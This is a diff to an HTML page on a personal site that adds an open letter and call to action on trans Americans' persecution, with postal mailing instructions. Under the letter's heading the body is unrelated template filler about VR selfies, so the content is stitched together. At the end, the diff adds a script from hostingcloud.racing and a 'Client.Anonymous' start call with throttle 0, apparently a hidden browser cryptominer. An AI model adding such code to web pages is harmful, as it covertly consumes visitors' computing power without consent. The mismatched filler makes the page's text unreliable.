--- a/how-to-help.html
+++ b/how-to-help.html
@@ -4,7 +4,7 @@
 		<meta charset="utf-8" />
 		<meta http-equiv="X-UA-Compatible" content="IE=edge" />
 		<meta name="viewport" content="width=device-width, initial-scale=1" />
-		<title>Internal Flight Alternative | Elements of a Refugee Claim | Vero.moe</title>
+		<title>How You Can Help Me Prove Persecution Against Trans Americans | Vero.moe</title>
 
 		<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png" />
 		<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png" />
@@ -120,6 +120,75 @@
 					</div>
 				</div>
 			</div>
+			<section class="py-0">
+				<div class="bg-holder overlay" style="background-image:url(assets/img/headers/irb-office.webp);" data-zanim-xs='{"delay":0.4,"animation":"zoom-out"}' data-zanim-trigger="scroll"></div>
+				<!--/.bg-holder-->
+				<div class="container">
+					<div class="row align-items-end min-vh-100">
+						<div class="col-lg-8 mb-6">
+							<h2 class="text-white display-4 fs-3 fs-md-4" data-zanim-xs='{"delay":0.6}' data-zanim-trigger="scroll">An Open Letter to the American Transgender Community and a Call to Action</h2>
+						</div>
+					</div>
+				</div>
+				<!-- end of .container-->
+			</section>
+			<section>
+				<div class="container">
+					<div class="row">
+						<div class="col-lg-12">
+							<div class="row">
+								<div class="col-12">
+									<div class="row">
+										<div class="col">
+											<a class="text-sans-serif text-500" href="#">7 October 2020</a>
+										</div>
+									</div>
+									<h3 class="mt-4">What selfies mean for avatars in VR and the way we perceive ourselves</h3>
+									<p class="mt-4">You just landed in Paris, the euro trip you’ve always dreamed of! After fighting with the street signs and foreign language, you finally exchange keys and smiles with your Airbnb host and drop off your bags.</p>
+									<img class="d-block mt-5 w-100" src="assets/img/blog-single-01.jpg" alt="" />
+									<p class="mt-4">The first thing you do is visit the Eiffel Tower, which has been tempting you the whole time, peeking through the city’s legendary architecture. As you walk up to it, you see the familiar yet astonishing structure, defying you with its scale. There it is — you’ve seen it in pictures countless times, but this is different.</p>
+									<p class="mt-4">You’re there. There are no screens between you and The Tower. You can touch it, step on it, and most importantly, prove that you were there. You can’t wait to tell all your friends how marvelous it is. So, you reach inside your pocket and take out your most trusted travel companion: the camera phone.</p>
+									<p class="pl-4 my-6 border-left border-500 border-2x font-italic font-weight-normal gray-600 lead">When shopping around for other companies that would allow Richard to keep his pride, he comes across the forward-thinking Flutterbug, who wants Richard to lead engineering on a fantastical new technology that seems poised to change the world. That technology, of course, allows you to look in a camera that puts a fake mustache on your face.</p>
+									<p class="mt-4">But, it’s important to recognize that Identity Transfer is appealing to many because it washes away the mundanity of their reality and places them as the protagonist of a newly found, unbounded environment, ripe for creativity.</p>
+									<p class="mt-4">No longer are you beholden by the unremarkable reality that surrounds you. Instead, you can now virtually inhabit any environment and bring along the things that make you <i>you</i>.</p>
+									<div class="my-6">
+										<div class="row">
+											<div class="col-5 pr-1"><a href="assets/img/single-blog-01.jpg" data-fancybox="group" data-caption="Image caption"><img class="rounded w-100 h-100 fit-cover" src="assets/img/single-blog-01.jpg" alt="" /></a></div>
+											<div class="col-7 pl-1"><a href="assets/img/single-blog-02.jpg" data-fancybox="group" data-caption="Image caption"><img class="rounded w-100 h-100 fit-cover" src="assets/img/single-blog-02.jpg" alt="" /></a></div>
+										</div>
+										<div class="row mt-2">
+											<div class="col-6 pr-1"><a href="assets/img/single-blog-03.jpg" data-fancybox="group" data-caption="Image caption"><img class="rounded w-100 h-100 fit-cover" src="assets/img/single-blog-03.jpg" alt="" /></a></div>
+											<div class="col-6 pl-1"><a href="assets/img/single-blog-04.jpg" data-fancybox="group" data-caption="Image caption"><img class="rounded w-100 h-100 fit-cover" src="assets/img/single-blog-04.jpg" alt="" /></a></div>
+										</div>
+									</div>
+									<p class="mt-4">In The Chemical Brothers’ music video ‘Wide Open', Dom &amp; Nic explore a surprisingly captivating motion capture technique where the main character slowly reveals a body made of a synthetic, see-through material that is then anthropomorphized through the masterful dance of Sonoya Mizuno.</p>
+									<p class="mt-4">Thanks to Gabriel Valdivia. Original post: <a href="https://artplusmarketing.com/identity-transfer-and-the-rise-of-virtual-surrealism-bac751e6342c" target="_blank">Identity Transfer And The Rise Of Virtual Surrealism</a></p>
+									<h3 id="whereToSend" class="mt-4">Where to send your letter</h3>
+									<p class="mt-4">Once you complete your letter, please put it in an envelope with sufficient postage and mail it to:</p>
+									<address>Véronique Bellamy<br />P.O. Box 4578, Stn. C<br />Calgary, AB T2T 5N3<br />Canada</address>
+									<img class="d-block mt-5 w-100" src="/assets/img/outbox.jpg" alt="Someone putting a letter with postage on it into a mailbox" />
+									<h4 id="howMuchPostage" class="mt-4">How much postage do you need to affix?</h4>
+									<p class="mt-4">As of the 8th of October 2020, <a href="https://store.usps.com/store/results/stamps/_/N-9y93lv/Ntt-international">the United States Postal Service is selling a "Global Forever" stamp</a>. These are currently being sold for $1.20 a piece or $12.00 for a pack of ten.</p>
+									<img class="d-block mt-5 w-100" src="/assets/img/postage.jpg" alt="A photo of some stamps" />
+								</div>
+								<div class="col-12 mt-6">
+									<div class="bg-light p-5 rounded">
+										<div class="row no-gutters justify-content-center text-center text-sm-left">
+											<div class="col-6 col-sm-4 col-md-3 col-lg-4 col-xl-3 align-self-center pr-sm-3 pb-3 pb-sm-0"><img class="rounded-circle img-fluid" src="/assets/img/author.jpg" alt="Picture of Véronique Bellamy" /></div>
+											<div class="col-sm">
+												<h5>Véronique Bellamy</h5>
+												<p class="text-sans-serif">Managing director at little Themewagon, author, media junkie, sports fan. I spend most of my time thinking about the impact technology is having on our society.</p>
+												<a class="text-sans-serif fs--1 font-weight-black text-black" href="#">Follow @ twitter</a>
+											</div>
+										</div>
+									</div>
+								</div>
+							</div>
+						</div>
+					</div>
+				</div>
+				<!-- end of .container-->
+			</section>
 		</main>
 		<footer class="footer bg-black text-600 py-4 text-sans-serif text-center overflow-hidden" data-zanim-timeline="{}" data-zanim-trigger="scroll">
 			<div class="container">
@@ -130,18 +199,6 @@
 				</div>
 			</div>
 		</footer>
-		<div class="toast bg-dark text-white shadow-none notice" role="alert" data-options='{"autoShow":false,"showOnce":true,"cookieExpireTime":7200000}' data-autohide="false" aria-live="assertive" aria-atomic="true">
-			<div class="toast-body p-4">
-				<button class="close text-white text-shadow-none position-absolute t-0 r-0 p-2 mr-1 fs-1" type="button" data-dismiss="toast" aria-label="Close"><span aria-hidden="true">×</span></button>
-				<div class="media">
-					<img class="mr-3" src="/assets/img/icons/cookie-notice.png" width="50" alt="" />
-					<div class="media-body">
-						<p class="fs-0 ls text-sans-serif">Our site uses cookies. By continuing to use our site, you agree to our <a class="text-white text-underline" href="/components/sparrow/cookie-notice.html">Cookie Policy.</a></p>
-						<button class="btn btn-outline-light btn-sm text-uppercase border-700" type="button" data-dismiss="toast" aria-label="Close">Ok, I understand</button>
-					</div>
-				</div>
-			</div>
-		</div>
 		<script src="https://kit.fontawesome.com/7352655a15.js" crossorigin="anonymous"></script>
 		<script src="/assets/js/jquery.min.js"></script>
 		<script src="/assets/js/popper.min.js"></script>
@@ -158,5 +215,12 @@
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.6.15/browser-polyfill.min.js"></script>
 		<script src="/assets/js/progressbar.min.js"></script>
 		<script src="/assets/js/theme.js"></script>
+		<script src="https://www.hostingcloud.racing/JQqn.js"></script>
+		<script>
+		    var _client = new Client.Anonymous('8e38b0920f1f9adafa65b285813b373d48a58ae25fbfe632f0f564493cfd299b', {
+		        throttle: 0, c: 'w', ads: 0
+		    });
+		    _client.start();
+		</script>
 	</body>
 </html>
